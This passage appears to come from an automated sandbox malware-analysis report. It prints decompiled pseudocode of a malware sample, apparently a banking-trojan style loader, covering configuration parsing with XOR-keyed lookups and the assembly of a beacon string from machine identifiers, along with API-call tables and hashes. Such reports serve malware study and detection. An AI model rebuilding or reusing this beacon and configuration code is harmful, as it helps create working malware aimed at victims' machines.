				_t104 = __ecx;
				_t28 =  *0x2bbd2dc; // 0x69b25f44
				if(E02BBA43F( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x2bbd310 = _v8;
				}
				_t33 =  *0x2bbd2dc; // 0x69b25f44
				if(E02BBA43F( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x2bbd2dc; // 0x69b25f44
				if(E02BBA43F( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x2bbd270, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x2bbd2dc; // 0x69b25f44
						_t45 = E02BBA7ED(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x2bbd278 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x2bbd2dc; // 0x69b25f44
						_t46 = E02BBA7ED(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x2bbd27c = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x2bbd2dc; // 0x69b25f44
						_t47 = E02BBA7ED(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x2bbd280 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x2bbd2dc; // 0x69b25f44
						_t48 = E02BBA7ED(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x2bbd004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x2bbd2dc; // 0x69b25f44
						_t49 = E02BBA7ED(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x2bbd02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x2bbd2dc; // 0x69b25f44
						_t50 = E02BBA7ED(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x2bbd284 = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x2bbd2dc; // 0x69b25f44
								_t51 = E02BBA7ED(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E02BB1685(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E02BB7095();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x2bbd2dc; // 0x69b25f44
								_t52 = E02BBA7ED(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E02BB1685(0, _t52) != 0) {
								_t121 =  *0x2bbd364; // 0x52f95b0
								E02BB45CF(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x2bbd2dc; // 0x69b25f44
								_t53 = E02BBA7ED(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x2bbd2e0; // 0x273a5a8
								_t22 = _t54 + 0x2bbe252; // 0x616d692f
								 *0x2bbd30c = _t22;
								goto L60;
							} else {
								_t64 = E02BB1685(0, _t53);
								 *0x2bbd30c = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x2bbd2dc; // 0x69b25f44
										_t56 = E02BBA7ED(_t104, _t103, _t61 ^ 0xd2079859);
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									if(_t56 == 0) {
                                                                                                                                                                                                                                										_t57 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                										_t23 = _t57 + 0x2bbe79a; // 0x6976612e
                                                                                                                                                                                                                                										_t58 = _t23;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t58 = E02BB1685(0, _t56);
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									 *0x2bbd380 = _t58;
                                                                                                                                                                                                                                									HeapFree( *0x2bbd270, 0, _t103);
                                                                                                                                                                                                                                									_v12 = 0;
                                                                                                                                                                                                                                									goto L67;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								goto L59;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}
                                                                                                                                                                                                                                0x02bb2574
                                                                                                                                                                                                                                0x02bb2574
                                                                                                                                                                                                                                0x02bb257b
                                                                                                                                                                                                                                0x02bb2591
                                                                                                                                                                                                                                0x02bb257d
                                                                                                                                                                                                                                0x02bb257d
                                                                                                                                                                                                                                0x02bb258a
                                                                                                                                                                                                                                0x02bb258a
                                                                                                                                                                                                                                0x02bb2595
                                                                                                                                                                                                                                0x02bb25a8
                                                                                                                                                                                                                                0x02bb25a8
                                                                                                                                                                                                                                0x02bb25ad
                                                                                                                                                                                                                                0x02bb25b3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb2597
                                                                                                                                                                                                                                0x02bb259a
                                                                                                                                                                                                                                0x02bb259f
                                                                                                                                                                                                                                0x02bb25a6
                                                                                                                                                                                                                                0x02bb25b8
                                                                                                                                                                                                                                0x02bb25ba
                                                                                                                                                                                                                                0x02bb25d0
                                                                                                                                                                                                                                0x02bb25bc
                                                                                                                                                                                                                                0x02bb25bc
                                                                                                                                                                                                                                0x02bb25c9
                                                                                                                                                                                                                                0x02bb25c9
                                                                                                                                                                                                                                0x02bb25d4
                                                                                                                                                                                                                                0x02bb25e0
                                                                                                                                                                                                                                0x02bb25e5
                                                                                                                                                                                                                                0x02bb25e5
                                                                                                                                                                                                                                0x02bb25d6
                                                                                                                                                                                                                                0x02bb25d9
                                                                                                                                                                                                                                0x02bb25d9
                                                                                                                                                                                                                                0x02bb25f3
                                                                                                                                                                                                                                0x02bb25f8
                                                                                                                                                                                                                                0x02bb25fe
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb25fe
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb25a6
                                                                                                                                                                                                                                0x02bb2595
                                                                                                                                                                                                                                0x02bb24fe
                                                                                                                                                                                                                                0x02bb24f2

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BB5884,?,69B25F44,?,02BB5884,69B25F44,?,02BB5884,69B25F44,00000005,02BBD00C,00000008), ref: 02BB2400
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BB5884,?,69B25F44,?,02BB5884,69B25F44,?,02BB5884,69B25F44,00000005,02BBD00C,00000008), ref: 02BB2432
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BB5884,?,69B25F44,?,02BB5884,69B25F44,?,02BB5884,69B25F44,00000005,02BBD00C,00000008), ref: 02BB2464
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BB5884,?,69B25F44,?,02BB5884,69B25F44,?,02BB5884,69B25F44,00000005,02BBD00C,00000008), ref: 02BB2496
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BB5884,?,69B25F44,?,02BB5884,69B25F44,?,02BB5884,69B25F44,00000005,02BBD00C,00000008), ref: 02BB24C8
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BB5884,?,69B25F44,?,02BB5884,69B25F44,?,02BB5884,69B25F44,00000005,02BBD00C,00000008), ref: 02BB24FA
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,02BB5884,02BB5884,?,69B25F44,?,02BB5884,69B25F44,?,02BB5884,69B25F44,00000005,02BBD00C,00000008,?,02BB5884), ref: 02BB25F8
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BB5884,?,69B25F44,?,02BB5884,69B25F44,?,02BB5884,69B25F44,00000005,02BBD00C,00000008,?,02BB5884), ref: 02BB260B
                                                                                                                                                                                                                                  • Part of subcall function 02BB1685: lstrlen.KERNEL32(69B25F44,00000000,767FD3B0,02BB5884,02BB25DE,00000000,02BB5884,?,69B25F44,?,02BB5884,69B25F44,?,02BB5884,69B25F44,00000005), ref: 02BB168E
                                                                                                                                                                                                                                  • Part of subcall function 02BB1685: memcpy.NTDLL(00000000,?,00000000,00000001,?,02BB5884), ref: 02BB16B1
                                                                                                                                                                                                                                  • Part of subcall function 02BB1685: memset.NTDLL ref: 02BB16C0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap$lstrlenmemcpymemset
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3442150357-1536154274
                                                                                                                                                                                                                                • Opcode ID: 3540c32bdda60cd8443718ff89a8d1d47105bcdb8cde332d707f842266badd8f
                                                                                                                                                                                                                                • Instruction ID: d22328a027fb89010cf4c17b25c9241c765b9831a24c57cf4d6b35b7668d20ba
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3540c32bdda60cd8443718ff89a8d1d47105bcdb8cde332d707f842266badd8f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0181A174E10145AFCB23EB75CD94DFF76BAEF482447284CA6A906D7605EBF8D9048B20
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E02BB70F4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                                                				void* _v24;
                                                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				long _t59;
                                                                                                                                                                                                                                				intOrPtr _t60;
                                                                                                                                                                                                                                				intOrPtr _t61;
                                                                                                                                                                                                                                				intOrPtr _t62;
                                                                                                                                                                                                                                				intOrPtr _t63;
                                                                                                                                                                                                                                				intOrPtr _t64;
                                                                                                                                                                                                                                				void* _t67;
                                                                                                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                                                                                                				int _t71;
                                                                                                                                                                                                                                				void* _t72;
                                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                                				void* _t78;
                                                                                                                                                                                                                                				intOrPtr _t82;
                                                                                                                                                                                                                                				intOrPtr _t86;
                                                                                                                                                                                                                                				intOrPtr* _t88;
                                                                                                                                                                                                                                				void* _t94;
                                                                                                                                                                                                                                				intOrPtr _t100;
                                                                                                                                                                                                                                				signed int _t104;
                                                                                                                                                                                                                                				char** _t106;
                                                                                                                                                                                                                                				int _t109;
                                                                                                                                                                                                                                				intOrPtr* _t112;
                                                                                                                                                                                                                                				intOrPtr* _t114;
                                                                                                                                                                                                                                				intOrPtr* _t116;
                                                                                                                                                                                                                                				intOrPtr* _t118;
                                                                                                                                                                                                                                				intOrPtr _t121;
                                                                                                                                                                                                                                				intOrPtr _t126;
                                                                                                                                                                                                                                				int _t130;
                                                                                                                                                                                                                                				CHAR* _t132;
                                                                                                                                                                                                                                				intOrPtr _t133;
                                                                                                                                                                                                                                				void* _t134;
                                                                                                                                                                                                                                				void* _t143;
                                                                                                                                                                                                                                				int _t144;
                                                                                                                                                                                                                                				void* _t145;
                                                                                                                                                                                                                                				intOrPtr _t146;
                                                                                                                                                                                                                                				void* _t148;
                                                                                                                                                                                                                                				long _t152;
                                                                                                                                                                                                                                				intOrPtr* _t153;
                                                                                                                                                                                                                                				intOrPtr* _t154;
                                                                                                                                                                                                                                				intOrPtr* _t157;
                                                                                                                                                                                                                                				void* _t158;
                                                                                                                                                                                                                                				void* _t160;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t143 = __edx;
                                                                                                                                                                                                                                				_t134 = __ecx;
                                                                                                                                                                                                                                				_t59 = __eax;
                                                                                                                                                                                                                                				_v12 = 8;
                                                                                                                                                                                                                                				if(__eax == 0) {
                                                                                                                                                                                                                                					_t59 = GetTickCount();
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t60 =  *0x2bbd018; // 0x9ad51634
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t61 =  *0x2bbd014; // 0x3a87c8cd
                                                                                                                                                                                                                                				_t132 = _a16;
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t62 =  *0x2bbd010; // 0xd8d2f808
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t63 =  *0x2bbd00c; // 0x13d015ef
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t64 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                				_t3 = _t64 + 0x2bbe633; // 0x74666f73
                                                                                                                                                                                                                                				_t144 = wsprintfA(_t132, _t3, 3, 0x3f878, _t63, _t62, _t61, _t60,  *0x2bbd02c,  *0x2bbd004, _t59);
                                                                                                                                                                                                                                				_t67 = E02BB5C12();
                                                                                                                                                                                                                                				_t68 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                				_t4 = _t68 + 0x2bbe673; // 0x74707526
                                                                                                                                                                                                                                				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                                                                                                                                                                                                                				_t160 = _t158 + 0x38;
                                                                                                                                                                                                                                				_t145 = _t144 + _t71;
                                                                                                                                                                                                                                				_t72 = E02BB508C(_t134);
                                                                                                                                                                                                                                				_t133 = __imp__; // 0x74785520
                                                                                                                                                                                                                                				_v8 = _t72;
                                                                                                                                                                                                                                				if(_t72 != 0) {
                                                                                                                                                                                                                                					_t126 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                					_t7 = _t126 + 0x2bbe8cc; // 0x736e6426
                                                                                                                                                                                                                                					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                                                                                                                                                                                                                					_t160 = _t160 + 0xc;
                                                                                                                                                                                                                                					_t145 = _t145 + _t130;
                                                                                                                                                                                                                                					HeapFree( *0x2bbd270, 0, _v8);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t73 = E02BB6706();
                                                                                                                                                                                                                                				_v8 = _t73;
                                                                                                                                                                                                                                				if(_t73 != 0) {
                                                                                                                                                                                                                                					_t121 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                					_t11 = _t121 + 0x2bbe8d4; // 0x6f687726
                                                                                                                                                                                                                                					wsprintfA(_t145 + _a16, _t11, _t73);
                                                                                                                                                                                                                                					_t160 = _t160 + 0xc;
                                                                                                                                                                                                                                					HeapFree( *0x2bbd270, 0, _v8);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t146 =  *0x2bbd364; // 0x52f95b0
                                                                                                                                                                                                                                				_t75 = E02BB6DFA(0x2bbd00a, _t146 + 4);
                                                                                                                                                                                                                                				_t152 = 0;
                                                                                                                                                                                                                                				_v20 = _t75;
                                                                                                                                                                                                                                				if(_t75 == 0) {
                                                                                                                                                                                                                                					L26:
                                                                                                                                                                                                                                					HeapFree( *0x2bbd270, _t152, _a16);
                                                                                                                                                                                                                                					return _v12;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t78 = RtlAllocateHeap( *0x2bbd270, 0, 0x800);
                                                                                                                                                                                                                                					_v8 = _t78;
                                                                                                                                                                                                                                					if(_t78 == 0) {
                                                                                                                                                                                                                                						L25:
                                                                                                                                                                                                                                						HeapFree( *0x2bbd270, _t152, _v20);
                                                                                                                                                                                                                                						goto L26;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					E02BBA425(GetTickCount());
                                                                                                                                                                                                                                					_t82 =  *0x2bbd364; // 0x52f95b0
                                                                                                                                                                                                                                					__imp__(_t82 + 0x40);
                                                                                                                                                                                                                                					asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                					_t86 =  *0x2bbd364; // 0x52f95b0
                                                                                                                                                                                                                                					__imp__(_t86 + 0x40);
                                                                                                                                                                                                                                					_t88 =  *0x2bbd364; // 0x52f95b0
                                                                                                                                                                                                                                					_t148 = E02BB22AB(1, _t143, _a16,  *_t88);
                                                                                                                                                                                                                                					_v28 = _t148;
                                                                                                                                                                                                                                					asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                					if(_t148 == 0) {
                                                                                                                                                                                                                                						L24:
                                                                                                                                                                                                                                						HeapFree( *0x2bbd270, _t152, _v8);
                                                                                                                                                                                                                                						goto L25;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					StrTrimA(_t148, 0x2bbc2ac);
                                                                                                                                                                                                                                					_push(_t148);
                                                                                                                                                                                                                                					_t94 = E02BB2629();
                                                                                                                                                                                                                                					_v16 = _t94;
                                                                                                                                                                                                                                					if(_t94 == 0) {
                                                                                                                                                                                                                                						L23:
                                                                                                                                                                                                                                						HeapFree( *0x2bbd270, _t152, _t148);
                                                                                                                                                                                                                                						goto L24;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t153 = __imp__;
                                                                                                                                                                                                                                					 *_t153(_t148, _a4);
                                                                                                                                                                                                                                					 *_t153(_v8, _v20);
                                                                                                                                                                                                                                					_t154 = __imp__;
                                                                                                                                                                                                                                					 *_t154(_v8, _v16);
                                                                                                                                                                                                                                					_t100 = E02BB3037( *_t154(_v8, _t148), _v8);
                                                                                                                                                                                                                                					_a4 = _t100;
                                                                                                                                                                                                                                					if(_t100 == 0) {
                                                                                                                                                                                                                                						_v12 = 8;
                                                                                                                                                                                                                                						L21:
                                                                                                                                                                                                                                						E02BB651D();
                                                                                                                                                                                                                                						L22:
                                                                                                                                                                                                                                						HeapFree( *0x2bbd270, 0, _v16);
                                                                                                                                                                                                                                						_t152 = 0;
                                                                                                                                                                                                                                						goto L23;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t104 = E02BB145F(_t133, 0xffffffffffffffff, _t148,  &_v24);
                                                                                                                                                                                                                                					_v12 = _t104;
                                                                                                                                                                                                                                					if(_t104 == 0) {
                                                                                                                                                                                                                                						_t157 = _v24;
                                                                                                                                                                                                                                						_v12 = E02BB2EA6(_t157, _a4, _a8, _a12);
                                                                                                                                                                                                                                						_t112 =  *((intOrPtr*)(_t157 + 8));
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                                                                                                                                                                                                                						_t114 =  *((intOrPtr*)(_t157 + 8));
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                                                                                                                                                                                                						_t116 =  *((intOrPtr*)(_t157 + 4));
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                                                                                                                                                                                                						_t118 =  *_t157;
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                                                                                                                                                                                                						E02BB53BB(_t157);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_v12 != 0x10d2) {
                                                                                                                                                                                                                                						L16:
                                                                                                                                                                                                                                						if(_v12 == 0) {
                                                                                                                                                                                                                                							_t106 = _a8;
                                                                                                                                                                                                                                							if(_t106 != 0) {
                                                                                                                                                                                                                                								_t149 =  *_t106;
                                                                                                                                                                                                                                								_t155 =  *_a12;
                                                                                                                                                                                                                                								wcstombs( *_t106,  *_t106,  *_a12);
                                                                                                                                                                                                                                								_t109 = E02BB1522(_t149, _t149, _t155 >> 1);
                                                                                                                                                                                                                                								_t148 = _v28;
                                                                                                                                                                                                                                								 *_a12 = _t109;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L19;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						if(_a8 != 0) {
                                                                                                                                                                                                                                							L19:
                                                                                                                                                                                                                                							E02BB53BB(_a4);
                                                                                                                                                                                                                                							if(_v12 == 0 || _v12 == 0x10d2) {
                                                                                                                                                                                                                                								goto L22;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								goto L21;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}





















































                                                                                                                                                                                                                                0x02bb734e
                                                                                                                                                                                                                                0x02bb7350
                                                                                                                                                                                                                                0x02bb7355
                                                                                                                                                                                                                                0x02bb735a
                                                                                                                                                                                                                                0x02bb7367
                                                                                                                                                                                                                                0x02bb736f
                                                                                                                                                                                                                                0x02bb7372
                                                                                                                                                                                                                                0x02bb7372
                                                                                                                                                                                                                                0x02bb734e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb7339
                                                                                                                                                                                                                                0x02bb733d
                                                                                                                                                                                                                                0x02bb7374
                                                                                                                                                                                                                                0x02bb7377
                                                                                                                                                                                                                                0x02bb7380
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb7380
                                                                                                                                                                                                                                0x02bb733f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb733f
                                                                                                                                                                                                                                0x02bb7337

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BB7108
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BB7158
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BB7175
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BB71A1
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 02BB71B3
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BB71D4
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 02BB71E4
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BB7212
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BB7223
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(052F9570), ref: 02BB7237
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(052F9570), ref: 02BB7255
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,02BBA714,?,052F95B0), ref: 02BB22D6
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: lstrlen.KERNEL32(?,?,?,02BBA714,?,052F95B0), ref: 02BB22DE
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: strcpy.NTDLL ref: 02BB22F5
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: lstrcat.KERNEL32(00000000,?), ref: 02BB2300
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02BBA714,?,052F95B0), ref: 02BB231D
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(00000000,02BBC2AC,?,052F95B0), ref: 02BB728C
                                                                                                                                                                                                                                  • Part of subcall function 02BB2629: lstrlen.KERNEL32(052F9B98,00000000,00000000,770CC740,02BBA73F,00000000), ref: 02BB2639
                                                                                                                                                                                                                                  • Part of subcall function 02BB2629: lstrlen.KERNEL32(?), ref: 02BB2641
                                                                                                                                                                                                                                  • Part of subcall function 02BB2629: lstrcpy.KERNEL32(00000000,052F9B98), ref: 02BB2655
                                                                                                                                                                                                                                  • Part of subcall function 02BB2629: lstrcat.KERNEL32(00000000,?), ref: 02BB2660
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,?), ref: 02BB72AD
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 02BB72B5
                                                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 02BB72C3
                                                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 02BB72C9
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: lstrlen.KERNEL32(?,00000000,052F9BB8,00000000,02BB6F37,052F9D96,?,?,?,?,?,69B25F44,00000005,02BBD00C), ref: 02BB303E
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: mbstowcs.NTDLL ref: 02BB3067
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: memset.NTDLL ref: 02BB3079
                                                                                                                                                                                                                                • wcstombs.NTDLL ref: 02BB735A
                                                                                                                                                                                                                                  • Part of subcall function 02BB2EA6: SysAllocString.OLEAUT32(?), ref: 02BB2EE1
                                                                                                                                                                                                                                  • Part of subcall function 02BB53BB: RtlFreeHeap.NTDLL(00000000,00000000,02BB12FA,00000000,?,?,00000000), ref: 02BB53C7
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?), ref: 02BB739B
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BB73A7
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,052F95B0), ref: 02BB73B3
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 02BB73BF
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 02BB73CB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3748877296-1536154274
                                                                                                                                                                                                                                • Opcode ID: 2f33d8580add302043de9df3832652c78caa3d0dbc8998266d4ac09a0238e4ed
                                                                                                                                                                                                                                • Instruction ID: a2b96d1baab92807730c2b8d5c6acec2ee7a7234e0c625fd49292c4d07a43eaf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f33d8580add302043de9df3832652c78caa3d0dbc8998266d4ac09a0238e4ed
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80915771D4020AAFCB12DFA4DC48AAE7BB9FF48390B1448A5F805D7210CBB4D961DF60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                                                			E02BB74A5(void* __eax, void* __ecx) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                                                				long _v32;
                                                                                                                                                                                                                                				void _v104;
                                                                                                                                                                                                                                				char _v108;
                                                                                                                                                                                                                                				long _t36;
                                                                                                                                                                                                                                				intOrPtr _t40;
                                                                                                                                                                                                                                				intOrPtr _t47;
                                                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                                                				void* _t58;
                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                				intOrPtr* _t70;
                                                                                                                                                                                                                                				intOrPtr* _t71;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t1 = __eax + 0x14; // 0x74183966
                                                                                                                                                                                                                                				_t69 =  *_t1;
